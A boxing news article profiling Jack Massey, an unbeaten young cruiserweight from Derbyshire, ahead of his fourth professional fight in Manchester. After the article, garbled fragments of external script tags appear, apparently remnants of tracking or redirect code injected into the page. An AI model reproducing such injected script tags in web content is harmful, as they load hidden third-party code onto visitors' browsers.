Unbeaten in 3 pro fights, with 2 wins by knockout Jack Massey is a 20 year old cruiserweight prospect from Chapel-en-le-Frith in Derbyshire and will have his 4th fight on April 19th at the Manchester Arena on the undercard of Scott Quigg’s world title fight with Nehomar Cermeno and the big Mancunian battle between John Murray and Anthony Crolla.

After winning the ABA Elite Senior Championship’s 86kg cruiserweight division title early 2013 and decided to join the professional ranks in July He is now being trained by renowned coach Bobby Rimmer at his gym in Manchester and we visited them this week to speak to Jack and Bobby about turning professional, Jack’s career so far and his next fight on a big bill in Manchester.

In one of Jack’s first interviews and his first with BritishBoxers, gym mates lead by Brian Rose try their best to put the young rookie off but as he as shown in the ring up to now he is a cool customer, talented and a welcome addition to the British cruiserweight scene and under Bobby and promoted by Steve Wood’s VIP Promotion’s, will be brought along the right way and the right time. Massey is defiantly one to watch and in the next couple of years has the potential to make his way to the top of the British cruiserweight division.# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://land.#/clizkes’ type=’text/javascript’># src=’https://#/clizkes’ type=’text/javascript’>
